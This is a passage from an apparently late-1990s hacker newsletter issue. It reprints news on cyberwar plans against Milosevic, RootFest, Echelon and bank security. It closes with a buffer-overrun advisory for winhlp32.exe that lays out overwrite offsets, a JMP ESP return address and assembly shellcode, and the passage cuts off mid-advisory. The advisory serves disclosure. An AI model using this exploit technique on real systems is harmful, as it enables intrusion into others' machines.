inside.
On the other hand the Palm IIIx is a fully working unit. There is a
trick to make it work 100%. Like its predecessor the Palm III the demo,
if you could get your hands on one was not hard to reflash the OS rom
and presto you had a Palm III worth $500.00 and there was little effort
involved.
The IIIx poses a little more difficulty. They have employed a new
strategy. 1st 3Com went with the new Ezball Motorola Dragon processor,
and put the OS in static non-volatile memory. While it's not hard to
download a fresh copy of the OS from a real store bought IIIx, the trick
is in flashing the demo unit. The programs used to flash the III do
not work on the IIIx, all you will get is a 'wrong header card version'
message, which basically seals your fate. I have been working on trying
to flash the proper OS replacing the demo OS (which won't allow you to
input anything) to no avail. I put it out to the people who do these
things best. I know not what to do from here. I have a few insiders
helping but it is a much kept secret.
zzcrazyman
================================================================
@HWA
02.0 From the editor.
~~~~~~~~~~~~~~~~
#include <stdio.h>
#include <thoughts.h>
#include <backup.h>
main()
{
printf ("Read commented source!\n\n");
/*
*Well things are moving along rather smoothly, its been a comparitively
*slow (but interesting) week on the news front with some FBI action coming
*down on people and shit, not a good time for hacker groups right now as
*it looks like the crackdown is only going to get worse in the future.
*
*Anyway, drop into #hwa.hax0r.news the key is usually off and we're a
*friendly bunch, stop by and chat about some of the stories here or that
*you've seen elsewhere, other than that take it easy til next time...
*
*Here's #20, have at it...<snork, snork>
*/
printf ("EoF.\n");
}
Congrats, thanks, articles, news submissions and kudos to us at the
main address: hwa@press.usmc.net complaints and all nastygrams and
mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
127.0.0.1, private mail to cruciphux@dok.org
danke.
C*:.
@HWA
03.0 Clinton Authorizes Cyber Attack???
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Sangfroid
Reuters and Wired Online articles are referencing a print
story in Newsweek that claims that President Clinton
has authorized a "top-secret" plan against Slobodan
Milosevic. One part of this plan would use "computer
hackers" to attack his foreign bank accounts. Reuters
also claimed that Newsweek said that the report
instructed the CIA to wage "cyberwar" against Milosevic.
Now there are still a few questions that are not
answered in this news article. If the report was so
top-secret how did NewsWeek learn of it? Won't other
countries be rather upset when we "hack" into their
banks? And aren't his bank accounts frozen anyway, so
what is the point of breaking in? Newsweek even
admits that it does not have access to the original
report. Once again until we see confirmation HNN will
treat this story as extremely suspect.
Newsweek
http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
Reuters- Via Yahoo
http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990523/ts/yugoslavia_usa_cyberwar_2.html
Wired
http://www.wired.com/news/news/politics/story/19836.html
Newsweek
EXCLUSIVE
Cyberwar and Sabotage
President Clinton has OK'd a top-secret plan to destabilize
Milosevic - and go after his money
By Gregory L. Vistica
Covert action is seductive to policymakers in a bind. When diplomacy fails
and force falls short, presidents often turn to the CIA for secret solutions
to vexing problems. Unable to make the air war against Serbian leader
Slobodan Milosevic effective, and unwilling to invade with ground troops,
President Clinton has decided to try a clandestine third way. Earlier this
month national-security adviser Sandy Berger presented Clinton with a
covert plan to squeeze Milosevic.
The president liked the idea. Senior intelligence officials tell NEWSWEEK
that last week Clinton issued a "finding," a highly classified document
authorizing the spy agency to begin secret efforts "to find other ways to get
at Milosevic," in the words of one official. Two weeks ago Berger secretly
briefed members of the House and Senate Intelligence committees about
the details of the two-part plan. According to sources who have read the
finding, the CIA will train Kosovar rebels in sabotage - age-old tricks like
cutting telephone lines, blowing up buildings, fouling gasoline reserves and
pilfering food supplies - in an effort to undermine public support for the
Serbian leader and damage Yugoslav targets that can't be reached from
the air. That much is unsurprising. But the CIA has also been instructed to
conduct a cyberwar against Milosevic, using government hackers to tap
into foreign banks and, in the words of one U.S. official, "diddle with
Milosevic's bank accounts."
The finding was immediately criticized by some lawmakers who
questioned the wisdom - and legality - of launching a risky covert action
that, if discovered, could prolong the war, alienate other NATO
countries - and possibly blow back on the United States. Under the
finding, the allies were to be kept in the dark about the plan. Other
members of Congress privy to the finding wondered about its timing. Why
did Clinton authorize the operation just as diplomats had begun making
progress on a peace agreement? The White House declined to comment
on the finding, and NEWSWEEK does not have access to the entire
document. But some intelligence officials with knowledge of its contents
worry that the finding was put together too hastily, and that the potential
consequences haven't been fully thought out. "If they pull it off, it will be
great," says one government cyberwar expert. "If they screw it up, they
are going to be in a world of trouble."
By far the most controversial - and probably most difficult - part of the
operation would be the effort to hack into Milosevic's foreign bank
accounts. Intelligence sources believe they have identified banks in several
countries, including Russia, Greece and Cyprus, where the Serb leader has
hidden millions of dollars. But the Hollywood vision of a brainy nerd
draining bank accounts from his computer at CIA headquarters is a
fantasy. According to government intelligence experts, agents would have
to visit each of the banks, set up new accounts, then carefully watch how
the institution operates and look for weak links in its security. The National
Security Agency's hackers would use that information to try to overcome
today's sophisticated encryption software and fire walls. If they gained
access, the hackers could do almost anything they liked with Milosevic's
cash - steal it, move it to a dummy account or slowly drain it away a few
thousand dollars at a time.
But should they? The idea of a U.S.-sponsored plan to break into foreign
banks unnerves some intelligence officials, who point out that the operation
would be a breach of national sovereignty in friendly countries and open
the door to computer attacks on U.S. banks. What's more, the United
States would be the main loser if confidence in the world banking system
were undermined.
The sabotage plan also entails some serious problems. The CIA would
somehow have to find and train guerrillas without helping the Kosovo
Liberation Army, which the administration itself labeled a terrorist
organization just a year ago and which is believed to fund its operations
with profits from international drug smuggling. In the chaos now prevailing
in Kosovar refugee camps it will not be easy for the CIA to make sure the
anti-Milosevic rebels it signs up have no KLA ties. Intelligence officials
also worry it would be difficult to control the U.S.-trained rebels once
boot camp is over and they are set loose on Milosevic. "I'm afraid they
could use their training to carry out atrocities," says John Rothrock, the Air
Force's former chief of intelligence planning. "If they think they can rein
them in, it's tremendous naiveté."
Congress can complain all it likes, but it has no legal authority to stop the
finding. Lawmakers can try to block the plan by refusing to provide money
for the covert action, but the president can tap into his emergency funds to
finance it. At this point, it is not at all certain that the finding will ultimately
be carried out. If the grumblings from the Hill and the intelligence
community grow too loud, or if the risk-averse CIA chooses to drag its
feet, the president may opt to quietly kill the finding - and pretend it never
existed.
Newsweek, May 31, 1999
@HWA
03.1 More on the Cyberwar
~~~~~~~~~~~~~~~~~~~~
Contributed by Twstdpair (Source: MSNBC)
Cyberwar? The U.S. stands to lose
Experts argue plan to raid Milosevic's bank accounts would do more harm
than good
May 28 - It sounded like a Tom Clancy spy novel. Newsweek reported last week
that the CIA was planning to tinker with international bank accounts full of Slobodan
Milosevic's money - just another way of getting under the Yugoslav president's skin.
Information warfare experts disagree about the feasibility of such a cyberattack. But
there's little disagreement the U.S. stands to lose much more than it might gain from
firing the first volley in such an information war. In fact, some believe damage has
already been done.
THE NEWSWEEK STORY RAISED several issues: What international laws would govern a
U.S.-backed attack on a bank in a third-party nation? Is such an attack feasible in the
first place? What kind of retaliation might U.S. citizens, and their bank accounts,
face? But most important, what does even the possibility of such an attack do to the
integrity of international banking systems? The story on the cyberattack - fact, fiction
or somewhere in between - could already have put the U.S. at risk, said Kawika M. Dajuio,
executive vice president of the Financial Information Protection Association.
Banking systems hinge on public confidence. You put the money in; you're confident you'll
be able to take the money out. If there's any hint you might not be able to get at your
money, you'd withdraw it. Any attack on the integrity of a banking system anywhere -
particularly when retaliation seems like such an obvious possibility - chips away at
public confidence. "It bothers me because we have had conversations with the defense and
intelligence community. We thought this was off the table," Dajuio said. "We've had
discussions with rather senior policy-makers. We thought they understood the importance
of protecting public confidence in the payment system." But retaliation by foreign agents
might be just one source of insecurity for U.S. account holders. There's another: If the
government can and is willing to tinker with foreign accounts, what will stop it from
tinkering with mine?
COULD IT BE DONE? Could U.S. agents hijack Milosevic's money, allegedly stashed away in
foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control
bank accounts for years, through old-fashioned non-cyber methods, such as coercing bank
authorities, or even through legal methods such as freezing accounts. On the other hand,
it's not easy when the target knows what's coming. According to MSNBC analyst Bill Arkin,
the international community, including UNSCOM, is still trying to get its hands on Saddam
Hussein's assets. And such real-world tactics are a far cry from the cyberwar image of a
few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection
and some wits. There's disagreement about how possible that might be. "The audits we have
performed tell us [banks] are not invulnerable," says a security expert identifying himself
as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate
computer systems to test their vulnerability. "Banks have a little more security in place,
but that security is still not at a level where it's unbreakable." While money systems aren't
connected to the public Internet, "sometimes they have a modem dangling off for remote access,
or they use cryptography, but not correctly," he said. Others suggest cracking a bank that
holds Milosevic money - outside the more traditional methods - is nearly impossible. "I deal
in probabilities, and I've never seen it," said a man identifying himself as Louis Cipher, a
principal investor in Infowar.com. Cipher is also in charge of security at what he says is the
"sixth-largest brokerage in America." He suggested very few individuals have the skills
necessary to "tunnel" from an Internet connection through mainframe systems in banks - in
fact, a team of specialists and inside information would be required. "You'd have to be an
applications specialist to even navigate to a screen," he said. "You're talking well beyond
the skills of hackers. It would have to be an insider working with Job Control Language
sitting on the mainframe. The only one who would have that ability other than the U.S.
government would be organized crime." And Cipher is skeptical about the U.S. government's
ability to hire and hold the brightest minds in the security industry - since no government
agency can match the lure of stock options offered by a high-tech firm. Still, even the
possibility of the U.S. using a wired computer to move Milosevic's money drew swift reaction
from information warfare observers. Even hacker groups protested the notion, with a hacker
calling himself "sixtoed" setting up a Web page in protest. The reason: Since the U.S. relies
more on technology and information than any other nation, it stands to lose the most from such
a cyberwar. "I am not one for an information arms race," said Frank Cilluffo, senior analyst at
the Center for Strategic and International Studies in Washington. "We will lose that race....
We're a hell of a lot more susceptible to retaliation. The defensive implications outweigh the
offensive implications." Anyone can build up an information
warfare capability, Cilluffo said. And it's much more like guerrilla war than nuclear war - it's
easy for the enemy to hide, and there's no real deterrent. Therefore, retaliation could be swift
and indiscriminate. In addition, there is a general principle among security experts suggesting
once a system's security is compromised, it's much easier to compromise a second time. So the U.S.
could very well be paving the way for retribution.
WHY NO DENIALS? Fear of such retaliation attempts, or even the perception of such retaliation
attempts, drove Dajuio to start calling his friends on the intelligence community to complain
as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for.
"If it's true or it's just leaks, it's bad to have the story out there," Dajuio said. "I have yet
to have anyone tell me 'Don't worry, everything's OK.' ... If they haven't done anything, the
most appropriate thing to do is to come out and say they're not doing it."
The CIA isn't doing that; a spokesperson told MSNBC the agency couldn't comment on its activities,
but one source familiar with U.S. intelligence capabilities tells MSNBC to be "very skeptical" of the
Newsweek story. Meanwhile, opening the Pandora's box of cyberwar would lead to a
series of yet-to-be answered questions. International law isn't ready to handle such conflicts, says
Cilluffo - so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the
compromised bank sue the U.S. government? "What are the rules of engagement
here?" Cilluffo asked. "What is game, what is not game? This may be a harbinger of how we prosecute and
wage war in the future."
@HWA
04.0 RootFest Scares Officials In Minneapolis
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by erewhon
The hacker convention RootFest was held in Minneapolis
over the weekend. Evidently this scared the local
authorities enough to shut down several vulnerable
points in its computer network. The city respond to the
three day hacker convention by shutting down some
older dial-up modem lines. (Wonder if they will come
back online afterwards?) Other reports also indicate
that the Minneapolis City Police also shut down its
computer network over the weekend.
APB Online
http://www.apbonline.com/911/1999/05/21/hackers0521_01.html
WCCO Channel 4
http://www.wcco.com/news/stories/news-990521-184737.html
RootFest
http://www.rootfest.org
City of Minneapolis Action Plan
http://www.rootfest.org/Press/park.txt
APB Online:
HACKERS WORRY MINNEAPOLIS OFFICIALS
City Secures Its Computers as Conference Comes to Town
May 21, 1999
By Hans H. Chen
MINNEAPOLIS (APBNews.com) -- The arrival of several hundred
computer hackers this weekend has prompted the city to shut down
several vulnerable points in its computer network.
While the city's computer guru called the weekend shutdown "an
opportunity to remind ourselves of network-based security," the
conference organizer called the measures "an overly paranoid
precaution."
The hackers descended today on the Minneapolis Convention Center for
RootFest 99, a three-day discussion of computer security open to "the
computer underground, hackers, IT professionals, government agents,
feds," according to the conference's Web site.
The conference features sessions entitled "Circumventing Internet
Censorship," and "Internet Security in Europe: State of Affairs."
Speakers include both hackers and computer security consultants
City downplays concerns
But the city responded to the event by closing off some older dial-up
modem lines that a few telecommuting employees and remote city
agencies still use to connect into the city's network.
Don Saelens, the city's information technology manager, downplayed
concerns about possible hacking attempts.
The conference, Saelens said, presented "an opportunity to remind
ourselves of network-based security."
But Saelens did admit that the timing of the system shutdown was not
wholly coincidental.
"We've been doing a number of upgrades on our own networks, and
these were all slated to go out anyway this year," Saelens said. "I have
to admit, [this conference] was a reminder of network security that
heightened the awareness."
Police reportedly shut down
In addition, the Minneapolis Star Tribune reported that the city Police
Department shut down its computer network over the weekend. Saelens
and a police official refused to confirm the report, citing safety
concerns.
"The only thing the police is saying is we are not releasing anything we
are doing for security reasons," said Penny Parrish, a police
department spokeswoman.
'Hacker threat'?
Chris Lothos, an organizer of RootFest, attacked the city's measures in
a dispatch on the RootFest Web site.
"It's an overly paranoid precaution taken for the 'hacker threat' that
RootFest supposedly poses to the world at large," Lothos wrote.
The conference also printed on its Web site a copy of the e-mail memo
Saelens sent to city employees alerting them to the security measures.
Saelens said he's not sure how the group got a copy of his e-mail.
>Subject: FW: NOTICE TO ALL PARK BOARD COMPUTER USERS regarding Hacker
>Conference this weekend
>Importance: High
>
>Minneapolis Park and Recreation ITS Hacker conference action plan:
>
> In response to the City's action plan noted below, Park Board ITS
>will be disabling the Park Board's Email services Friday evening, May 21st
>through Monday morning, May 24th. Park Board users will not have access
>at all to their Park Board Email accounts during this time.
>
>In addition - Dial-In (Reachout) services will be disabled Thursday
>evening, May 20th beginning at 8:00pm through Monday morning, May 24th.
>The Minneapolis rec centers and other remote users will not be able to
>access their Reachout accounts during this time. Remote PEIRS users
>entering time are advised to do so by Thursday evening, May 20th by
>8:00pm.
>PEIRS users downtown, at the SSSC, or on frame-relay (golf courses) will
>be able to enter in time as usual.
>
>If you have questions, please contact the Park Board Help Desk at
>661-XXXX. Thank you for your cooperation.
>
>Larry Brandts
>Park Board ITS Manager
>
>
>-----Original Message-----
>From: XXXXXXXXXXX Sent: Wednesday, May 19, 1999 10:35 AM
>To: All Exchange Users
>Subject: NOTICE TO ALL CITY COMPUTER USERS
>
>To all City Staff,
>RootFest '99, a convention of so-called computer "hackers" will be meeting
>in Minneapolis this weekend, May 21-23. You may have read news stories
>about individuals (hackers) who have used their computer programming
>skills to gain unauthorized access (hack) into computer networks of
>government agencies, businesses, banks, or other high-profile
>organizations. Sometimes, these individuals hack into computers to
>perform fairly harmless computer pranks. However, that is not always the
>case. Hackers can also infect entire computer networks with disabling
>viruses.
>
>As a precautionary measure, we are reminding you of safe computing
>practices that should already be followed, as well as some additional
>steps we will be taking to protect the City from any unauthorized access
>to our network. To be successful, we will need the active participation
>of all City staff.
>
>1. Employees must turn off their computer terminals at the close of
>business each night.
>
>2. Those who have an individual analog phone line and modem should be
>turning off the modem every night. There are very few of these individual
>analog lines and modems left in the City, and they are being phased out
>because of their risk to network security. Anyone who has one of the new
>City image pc's does not have worry about this issue, as they are using
>the new City standard for remote access. If you have not had a line/modem
>installed, you do not need to do anything except turn off your pc.
>
>3. Employees will not have access to their City email accounts at all
>beginning Friday evening through Monday morning. There will not be access
>to email outside of the City from Thursday evening through Monday morning.
>
>4. Access to the City's network from outside locations will be
>temporarily cancelled Thursday evening through Monday morning. This will
>not impact the majority of staff members, but as an example, if you can
>currently check your City email account from home, you will not be able to
>do so during that timeframe.
>
>Employees who will be at work over the weekend will have access to Insite,
>the City's intranet, as well as the Internet.
> While I do not believe the City will be a target for these individuals, it
>is a prudent business decision to follow these simple safety precautions.
>If you have questions regarding any of these steps, please contact Wanda
>Forsythe, in ITS Security. Her number is 673-XXXX.
>
>Thank you for your attention to this matter.
>
>- Don Saelens
>* * * * * * * Sara Dietrich, Communications Department
>673-XXX; 673-XXXX (fax)
@HWA
05.0 Australia Admits to Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~
from HNN http://www.hackernews.com/
contributed by erewhon
Martin Brady, director of the Defense Signals Directorate
in Canberra Australia has admitted that his country
does participate in a secret spy organization known as
UKUSA. This organization works with the intelligence
agencies of Australia, Canada, New Zealand, the UK and
the USA to intercept every fax, telex, e-mail, phone
call, or computer data that is carried via commercial
satellite communications. This global eavesdropping is
known as Echelon.
The Age
http://www.theage.com.au/daily/990523/news/news3.html
The Age;
Careful, they might hear you
By DUNCAN CAMPBELL
Australia has become the first country openly to admit that it
takes part in a global electronic surveillance system that
intercepts the private and commercial international
communications of citizens and companies from its own and
other countries. The disclosure is made today in Channel 9's
Sunday program by Martin Brady, director of the Defence
Signals Directorate in Canberra.
Mr Brady's decision to break ranks and officially admit the
existence of a hitherto unacknowledged spying organisation
called UKUSA is likely to irritate his British and American
counterparts, who have spent the past 50 years trying to prevent
their own citizens from learning anything about them or their
business of ``signals intelligence'' - ``sigint'' for short.
In his letter to Channel 9 published today, Mr Brady states that
the Defence Signals Directorate (DSD) ``does cooperate with
counterpart signals intelligence organisations overseas under the
UKUSA relationship".
In other statements which have now been made publicly
available on the Internet (www.dsd.gov.au), he also says that
DSD's purpose ``is to support Australian Government
decision-makers and the Australian Defence Force with
high-quality foreign signals intelligence products and services.
DSD (provides) important information that is not available from
open sources".
Together with the giant American National Security Agency
(NSA) and its Canadian, British, and New Zealand
counterparts, DSD operates a network of giant, highly
automated tracking stations that illicitly pick up commercial
satellite communications and examine every fax, telex, e-mail,
phone call, or computer data message that the satellites carry.
The five signals intelligence agencies form the UKUSA pact.
They are bound together by a secret agreement signed in 1947
or 1948. Although its precise terms have never been revealed,
the UKUSA agreement provides for sharing facilities, staff,
methods, tasks and product between the participating
governments.
Now, due to a fast-growing UKUSA system called Echelon,
millions of messages are automatically intercepted every hour,
and checked according to criteria supplied by intelligence
agencies and governments in all five UKUSA countries. The
intercepted signals are passed through a computer system called
the Dictionary, which checks each new message or call against
thousands of ``collection'' requirements. The Dictionaries then
send the messages into the spy agencies' equivalent of the
Internet, making them accessible all over the world.
Australia's main contribution to this system is an ultra-modern
intelligence base at Kojarena, near Geraldton in Western
Australia. The station was built in the early 1990s. At Kojarena,
four satellite tracking dishes intercept Indian and Pacific Ocean
communications satellites. The exact target of each dish is
concealed by placing them inside golfball like ``radomes''.
About 80 per cent of the messages intercepted at Kojarena are
sent automatically from its Dictionary computer to the CIA or
the NSA, without ever being seen or read in Australia. Although
it is under Australian command, the station - like its controversial
counterpart at Pine Gap - employs American and British staff in
key posts.
Among the ``collection requirements" that the Kojarena
Dictionary is told to look for are North Korean economic,
diplomatic and military messages and data, Japanese trade
ministry plans, and Pakistani developments in nuclear weapons
technology and testing. In return, Australia can ask for
information collected at other Echelon stations to be sent to
Canberra.
A second and larger, although not so technologically
sophisticated DSD satellite station, has been built at Shoal Bay,
Northern Territory. At Shoal Bay, nine satellite tracking dishes
are locked into regional communications satellites, including
systems covering Indonesia and south-west Asia.
International and governmental concern about the UKUSA
Echelon system has grown dramatically since 1996, when New
Zealand writer Nicky Hager revealed intimate details of how it
operated. New Zealand runs an Echelon satellite interception
site at Waihopai, near Blenheim, South Island. Codenamed
``Flintlock", the Waihopai station is half the size of Kojarena and
its sister NSA base at Yakima, Washington, which also covers
Pacific rim states. Waihopai's task is to monitor two Pacific
communications satellites, and intercept all communications from
and between the South Pacific islands.
Like other Echelon stations, the Waihopai installation is
protected by electrified fences, intruder detectors and infra-red
cameras. A year after publishing his book, Hager and New
Zealand TV reporter John Campbell mounted a daring raid on
Waihopai, carrying a TV camera and a stepladder. From open,
high windows, they then filmed into and inside its operations
centre.
They were astonished to see that it operated completely
automatically.
Although Australia's DSD does not use the term ``Echelon'',
Government sources have confirmed to Channel 9 that Hager's
description of the system is correct, and that Australia's
Dictionary computer at Kojarena works in the same way as the
one in New Zealand.
Until this year, the US Government has tried to ignore the row
over Echelon by refusing to admit its existence. The Australian
disclosures today make this position untenable. US intelligence
writer Dr Jeff Richelson has also obtained documents under the
US Freedom of Information Act, showing that a US Navy-run
satellite receiving station at Sugar Grove, West Virginia, is an
Echelon site, and that it collects intelligence from civilian
satellites.
The station, south-west of Washington, lies in a remote area of
the Shenandoah Mountains. According to the released US
documents, the station's job is ``to maintain and operate an
Echelon site''. Other Echelon stations are at Sabana Seca,
Puerto Rico, Leitrim, Canada and at Morwenstow and London
in Britain.
Information is also fed into the Echelon system from taps on the
Internet, and by means of monitoring pods which are placed on
undersea cables. Since 1971, the US has used specially
converted nuclear submarines to attach tapping pods to deep
underwater cables around the world.
The Australian Government's decision to be open about the
UKUSA pact and the Echelon spy system has been motivated
partly by the need to respond to the growing international
concern about economic intelligence gathering, and partly by
DSD's desire to reassure Australians that its domestic spying
activity is strictly limited and tightly supervised.
According to DSD director Martin Brady, ``to ensure that (our)
activities do not impinge on the privacy of Australians, DSD
operates under a detailed classified directive approved by
Cabinet and known as the Rules on Sigint and Australian
Persons".
Compliance with this Cabinet directive is monitored by the
inspector-general of security and intelligence, Mr Bill Blick. He
says that ``Australian citizens can complain to my office about
the actions of DSD. And if they do so then I have the right to
conduct an inquiry."
But the Cabinet has ruled that Australians' international calls,
faxes or e-mails can be monitored by NSA or DSD in specified
circumstances. These include ``the commission of a serious
criminal offence; a threat to the life or safety of an Australian; or
where an Australian is acting as the agent of a foreign power".
Mr Brady says that he must be given specific approval in every
case. But deliberate interception of domestic calls in Australia
should be left to the police or ASIO.
Mr Brady claims that other UKUSA nations have to follow
Australia's lead, and not record their communications unless
Australia has decided that this is required. ``Both DSD and its
counterparts operate internal procedures to satisfy themselves
that their national interests and policies are respected by the
others," he says.
So if NSA happens to intercept a message from an Australian
citizen or company whom DSD has decided to leave alone, they
are supposed to strike out the name and insert ``Australian
national'' or ``Australian corporation'' instead. Or they must
destroy the intercept.
That's the theory, but specialists differ. According to Mr Hager,
junior members of UKUSA just can't say ``no''. ``... When
you're a junior ally like Australia or New Zealand, you never
refuse what they ask for.''
There are also worries about what allies might get up to with
information that Australia gives them. When Britain was trying to
see through its highly controversial deal to sell Hawk fighters and
other arms to Indonesia, staff at the Office of National
Assessments feared that the British would pass DSD intelligence
on East Timor to President Soeharto in order to win the lucrative
contract.
The Australian Government does not deny that DSD and its
UKUSA partners are told to collect economic and commercial
intelligence. Australia, like the US, thinks this is especially
justified if other countries or their exporters are perceived to be
behaving unfairly. Britain recognises no restraint on economic
intelligence gathering. Neither does France.
According to the former Canadian agent Mike Frost, it would
be ``naïve" for Australians to think that the Americans were not
exploiting stations like Kojarena for economic intelligence
purposes. ``They have been doing it for years," he says. ``Now
that the Cold War is over, the focus is towards economic
intelligence. Never ever over-exaggerate the power that these
organisations have to abuse a system such as Echelon. Don't
think it can't happen in Australia. It does.''
@HWA
06.0 Banks to Test Home User PC Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
from HNN http://www.hackernews.com/
contributed by Weld Pond
Worried that consumers' PCs may be vulnerable to
attack, a consortium of the 15 largest US banks plans to
open a lab to test PC hardware and software. The
Banking Industry Technology Secretariat plans to open
the lab this summer. (It's about time they started
looking into this. Applications like Back Orifice have been
around for what, over a year now? Sounds like someone
is just covering their ass.)
C|Net
http://www.news.com/News/Item/0,4,0-36923,00.html?st.ne.ni.lh
Big banks move on Net security
By Tim Clark
Staff Writer, CNET News.com
May 21, 1999, 1:00 p.m. PT
Worried that problems on home computers may make Internet banking insecure, a
group of major U.S. banks is expected to unveil a plan this summer to open a lab
to test the security of Web browsers and PC hardware and software.
"The banks feel that firewalls and what they have internally is in great shape, but the link is
to the consumer and PC environments [where they find security more suspect]," said
Catherine Allen, chief executive of the Banking Industry Technology Secretariat, a division
of Bankers Roundtable.
BITS is governed by a board of CEOs of the 15 largest U.S. banks, including familiar
names like Citibank, Chase Manhattan, Mellon Bank, Wells Fargo, and Bank of America.
Edward Crutchfield, First Union chief executive, chairs BITS, a two-year-old group that
focuses on technology issues affecting the U.S. banking system.
The BITS Security/Technology Lab, to be run by a new banking-oriented division of
government contractor SAIC, is due to be announced in late June or early July, with vice
president Al Gore and former U.S. Sen. Sam Nunn invited to speak. A July meeting is
planned in the San Francisco area to explain the program to hardware and software
vendors.
Security experts from major banks are currently drafting the testing criteria. In addition, the
lab oversight group is working with the President's Commission on Critical Infrastructure
Protection on ways to protect the nation's financial infrastructure from attacks by terrorist
or organized criminal groups. President Clinton formed that group a year ago after a report
on threats from cyber-terrorists.
The effort also will involve information sharing among banks to ward off organized attacks,
including use of neural networking and other technologies to detect and predict patterns of
attacks.
"If it's a terrorist or major criminal activity, we think it will happen in multiple places," Allen
said. "They won't hit just one bank but many." Security planners worry that assaults could
be mounted near the end of this year, when attackers hope banks might be distracted by
the Y2K turnover.
The testing of consumer devices and software will be coupled with educational campaigns
urging users to utilize antivirus software and take other precautions to avoid security
problems.
Systems that pass the tests can use a special logo in their marketing to signify the
products have been deemed safe by BITS. Also to be tested are systems to conduct
financial transactions, including personal financial software, online billing and bill-paying
packages, and smart cards.
"Vendors want this as much as we do," Allen contended, saying that today vendors may
get multiple requests from different banks to make specific changes for that bank's use.
Funneling through the BITS lab would simplify that process.
The effort comes as financial institutions are beginning to use the Internet for online
banking, stock trading, and other transactions. In the past, online consumer transactions
have been routed over private networks that banks regard as more secure. But the
explosion of the Internet, which is not such a controlled or secure environment, has
bankers looking for safety.
Another reflection of that concern has been the efforts by Visa and MasterCard, on the
behalf of their bank-owners, to push the Secure Electronic Transactions (SET) protocol for
Internet credit card purchases. Although SET has not been widely adopted in the U.S., the
prolonged push to implement it mirrors bankers' worries about their reputation as trusted
institutions.
But there's a financial implication too. Banks are heavily regulated, and they are required to
reimburse their customers for any losses suffered because of security breaches in online
financial transactions. As online banking grows, that could become a big liability.
@HWA
07.0 EMPEROR VIRUS
~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 25th May 1999 on 4.46 pm CET
AVP announced a new clone of the Chernobyl virus named Emperor. The Emperor
virus has additional technology to infect more systems by copying itself to more
areas of the computer, and so has the possibility to travel further. It infects DOS (16-bit)
COM and EXE programs and overwrites the Master Boot Record of the hard drive and
the boot sector on floppy diskettes.
08.0 WINHLP32.EXE BUFFER OVERRUN
~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
by BHZ, Tuesday 25th May 1999 on 1.01 am CET
David Litchfield aka Mnemonix wrote an advisory on winhlp32.exe buffer overrun. "The
buffer overrun in winhlp32.exe occurs when it attempts to read a cnt file with an overly
long heading string. If the string is longer than 507 bytes the buffer overrun does not
occur - winhlp32 just truncates the entry." Read the advisory below.
Analysis of the winhlp32.exe buffer overrun.
The buffer overrun in winhlp32.exe occurs when it attempts to read a cnt
file with an overly long heading string. If the string is longer than 507
bytes the buffer overrun does not occur - winhlp32 just truncates the entry.
The return address is overwritten with bytes 357, 358, 359 and 360.
Everything before these bytes is lost giving us bytes 361 to 507 to play
with - a total of 147 bytes for our exploit code. On playing around with the
overrun we find we lose about another 20 of these bytes giving us only 127
bytes to play with - not a lot really.
On overrunning the buffer and analysing the contents of memory and the CPU's
registers with a debugger we find that byte 361 is found at 0x0012F0E4. This
is the address we need the processor to jump to for its next
instruction - but this address has a NULL in it which totally messes things
up. However, looking at the registers we can see that ESP, the Stack
Pointer, holds this address, so if we can find somewhere in memory that does
a JMP ESP, and set the return address to this, then we should be able to get
back to the address where we'll place our exploit code. Looking at the DLLs
that winhlp32.exe uses we find that kernel32.dll has the JMP ESP instruction
at 0x77F327E5 (Service Pack 4's version of kernel32.dll - I think it's at
0x77F327D5 on Service Pack 3's kernel32.dll).
So we put 0x77F327E5 into bytes 357 to 360 but we have to load it in
backwards so byte 357 we'll set to 0xE5, byte 358 to 0x27, byte 359 to 0xF3
and byte 360 to 0x77.
Now we've jumped back to our exploit code we have to decide what we want to
put in it. Because we only have 127 bytes to do anything meaningful we need
to start another program - the best thing is to get it to run a batch file.
This means calling the system ( ) function which is exported by msvcrt.dll
which isn't loaded into the address space of winhlp32.exe - so we'll have to
load it. How do we do this? We have to call LoadLibrary ( ) which is
exported by kernel32.dll which is in the address space. LoadLibraryA ( ) is
exported at address 0x77F1381A so all we need to do is have the string
"msvcrt.dll" in memory somewhere and call 0x77F1381A with a reference to the
pointer to the null terminated "msvcrt.dll" string. Because it has to be
null terminated we'll get our code to write it into memory. Once this is
done we'll place the address of LoadLibraryA ( ) onto the stack then place
the address of the pointer to "msvcrt.dll" and finally call LoadLibraryA ( )
using an offset from the EBP. The following is the Assembly Code needed to
do this:
/*First the procedure prologue */
push ebp
mov ebp,esp
/*Now we need some zeroes */
xor eax,eax
/* and then push them onto the stack */
push eax
push eax
push eax
/* Now we write MSVCRT.DLL into the stack */
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
/* move the address of LoadLibraryA ( ) into the edx register */
mov edx,0x77F1381A
/* and then push it onto the stack */
push edx
/* Then we load the address where the msvcrt.dll string can be found */
lea eax,[ebp-0Ch]
/* and push it onto the stack */
push eax
/* Finally we call LoadLibraryA( ) */
call dword ptr[ebp-10h]
All things going well we should have now loaded msvcrt.dll into the address
space of winhlp32.exe. With this in place we now need to call system() and
provide the name of a batch file to it as an argument. We don't have enough
bytes to play with to call GetProcAddress ( ) and do the rest of the
things we have to do like clean up, so we check what version of msvcrt.dll we
have before writing the code and see where system ( ) is exported at. On a
standard install of Windows NT this will normally be version 4.20.6201 with
system () exported at 0x7801E1E1. We'll call the batch file ADD.bat but to
